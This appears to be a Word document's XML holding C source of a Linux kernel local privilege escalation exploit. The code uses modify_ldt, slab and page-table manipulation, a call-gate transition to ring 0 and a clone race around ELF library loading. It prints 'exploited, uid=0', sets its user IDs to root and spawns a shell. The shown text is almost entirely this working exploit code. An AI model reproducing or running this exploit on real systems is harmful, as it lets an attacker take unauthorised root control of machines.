    <w:p w14:paraId="4113B8A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sys_mprotect(addr, PAGE_SIZE, PROT_READ|map_flags);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA0AA0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r) fatal("mprotect 2", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA6A415" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F18A8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CPL0 transition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5D23A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ys_sched_yield();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462DB51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al = callme_1() + callme_2();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628994D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asm("lcall $" xstr(SEL_GATE) ",$0x0");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531EDEC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 getuid()==0 || (val==31337 &amp;&amp; strlen(hellc0de)==31337) ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6254813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 (getuid()==0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEE9C9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n[+] exploited, uid=0\n\n" ); fflush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F9EC6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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EEF0F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n[-] uid change failed" ); fflush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119E89B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igfailed(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A15665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7203773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gnal(SIGTERM, SIG_IGN);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A02270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kill(0, SIGTERM);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9FA5C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ab/>
        <w:t>setresuid(0, 0, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA7E7F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xecl(shellname, "sh", NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167B91D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atal("execl", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D963F6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280BB7B3" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="649320F9" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B64CD3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scan_mm_finish();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6521B23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scan_mm_start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BFA05B" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A77A6DD" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B49440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kernel page table scan code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C38EE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scan_mm()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4EA71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D6BD4A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addr -= PAGE_SIZE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC8C05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map_addr &lt;= (unsigned)addr_min)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C88792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can_mm_start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9C2D40" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4480BB8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cnt=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A7FF1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al = *(int*)map_addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF2F52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can_mm_finish();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB35EB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F4556E4" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32233C86" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD5B66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scan_mm_finish()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC3391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572705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retry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B8D0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__asm__("movl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%0, %%esp" : :"m"(old_esp) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376ED2FC" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A0EE4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scnt) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E206B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agemap[pidx] ^= 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B295E8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0D1CEB3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lse {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2977717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ys_madvise((void*)map_addr, PAGE_SIZE, MADV_DONTNEED);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6648EB0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166E1F2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idx--;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ACDA7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can_mm();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1745671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goto retry;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9093C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31812802" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42E8A6D9" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7255AFA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make kernel page maps before and after allocating LDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C410EF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scan_mm_start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E8A78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6670831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int npg=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056121E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struct modify_ldt_ldt_s l;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5D947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struct user_desc l;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7316AB3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num++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B3708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pnum==1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F0447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idx = max_page-1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F017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206703B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lse if(pnum==2) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B06A87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memset(&amp;l, 0, sizeof(l));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397A02B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l.entry_number = LDT_ENTRIES-1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C83C9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l.seg_32bit = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C9599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l.base_addr = MAGIC &gt;&gt; 16;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7E4BB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ab/>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>l.limit = MAGIC &amp; 0xffff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472CB51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l.limit_in_pages = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192BA02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modify_ldt(1, &amp;l, sizeof(l)) != 0 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ACA50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fatal("modify_ldt", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F42FC3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idx = max_page-1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D2B68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29B220A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lse if(pnum==3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319A9F6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npg=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E2D16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for(pidx=0; pidx&lt;=max_page-1; pidx++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87DD6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if(pagemap[pidx]) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A452D0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pg++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADD4E5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47144A6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else if(npg == LDT_PAGES) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707764F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pg=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F68B11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try_to_exploit(addr_min+(pidx-1)*PAGE_SIZE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5DBD8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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3BE00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npg=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0DF7B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4B71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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404FD8A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fatal("find LDT", 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523636A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04DCB923" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B713D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ave context &amp; scan page table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6481B5D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__asm__("movl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%%esp, %0" : :"m"(old_esp) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F29C78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addr = addr_max;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D9733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can_mm();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1126F78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EF1CB82" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D19042E" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C23D4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return number of available SLAB objects in cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB52A6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get_slab_objs(const char *sn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A287CF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3E4E2D5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int c, d, u = 0, a = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E9C9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FILE *fp=NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F39AD2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char x1[20];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B4DE1B" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB96DF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p = fopen("/proc/slabinfo", "r");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BCE43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fp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548AF38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fatal("get_slab_objs: fopen", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AC958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gets(name, sizeof(name) - 1, fp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F1F51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do {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5154A6C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 = u = a = -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37902E2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fgets(line, sizeof(line) - 1, fp))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3147C85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29DE801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 = sscanf(line, "%s %u %u %u %u %u %u", name, &amp;u, &amp;a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E49FD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 xml:space="preserve">   &amp;d, &amp;d, &amp;d, &amp;d);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D4B86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 while (strcmp(name, sn));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2EAD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lose(fileno(fp));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E8D09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close(fp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97F6F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eturn c == 7 ? a - u : -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE9689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85D8DF7" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381C304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long memmaped_size = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C74A45B" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D1F00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leave one object in the SLAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF1320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inline void prepare_slab()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6918097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5A2FB71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r;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738F517B" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C35C60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addr -= PAGE_SIZE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FA0AF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count++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3483E0E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flags ^= PROT_READ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4257CDB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p>
    <w:p w14:paraId="3D7BD07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void*)sys_mmap2((unsigned)map_addr, PAGE_SIZE, map_flags,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F9C0D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 xml:space="preserve">     MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7568073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MAP_FAILED == r) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E9C6A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gt; prepare_slab(), %dMb\n", memmaped_size/1024/1024);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D76263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fatal("try again", 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A5055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7DCBA48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emmaped_size += PAGE_SIZE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08732CB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map_addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4587AE1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012D9B7F" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB2F808" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E21AC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ig handlers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2A41B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segvcnt(int v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2628329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6F29C9A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cnt++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3129329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can_mm_finish();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148632C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B57D6E8" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73DC8CD2" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F134EF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child reap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C8811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reaper(int v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710D2DD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21A46CD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cnt++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEF745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aitpid(0, &amp;v, WNOHANG|WUNTRACED);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4F862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1DA3765" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8C0491" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7598179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ometimes I get the VMAs in reversed order...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CD47A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o just use anyone of the two but take care about the flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C41D49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check_vma_flags();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34865ECE" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21EFE18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vreversed(int v)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAB9F9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516D38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flags = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BEA4B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heck_vma_flags();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C0ACF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5B8159B" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3221DD03" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58287FC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check_vma_flags()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B9C36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058A8B1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map_flags) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F075D3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__asm__("movl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%%esp, %0" : :"m"(old_esp) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489072C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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68902E0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__asm__("movl</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6DCF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>%0, %%esp" : :"m"(old_esp) );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42DEC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goto out;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6668FAB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64662AF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gnal(SIGSEGV, vreversed);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8A6D2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ab/>
        <w:t>val = * (unsigned*)(lib_addr + PAGE_SIZE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8AC9A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out:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6642D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01EF6AA" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE9B950" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17771EF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use elf library and try to sleep on kmalloc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEA8DD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exploitme()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744F605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242FEC8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r, sz, pcnt=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D90F74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char smiley[]="-\\|/-\\|/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6BB757" w14:textId="77777777" w:rsidR="007A6DCF" w:rsidRPr="007A6DCF" w:rsidRDefault="007A6DCF" w:rsidP="007A6DCF">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="486535D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printf("\n    cat /proc/%d/maps", getpid() ); fflush(stdout);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCF132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helper clone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1FADA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inish=0; ccnt=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2655560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z = sizeof(cstack) / sizeof(cstack[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D12DA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pid = clone(&amp;raceme, (void*) &amp;cstack[sz-16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD0DF2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CLONE_VM|CLONE_SIGHAND|CLONE_FS|SIGCHLD, NULL );</w:t>
      </w:r>
    </w:p>
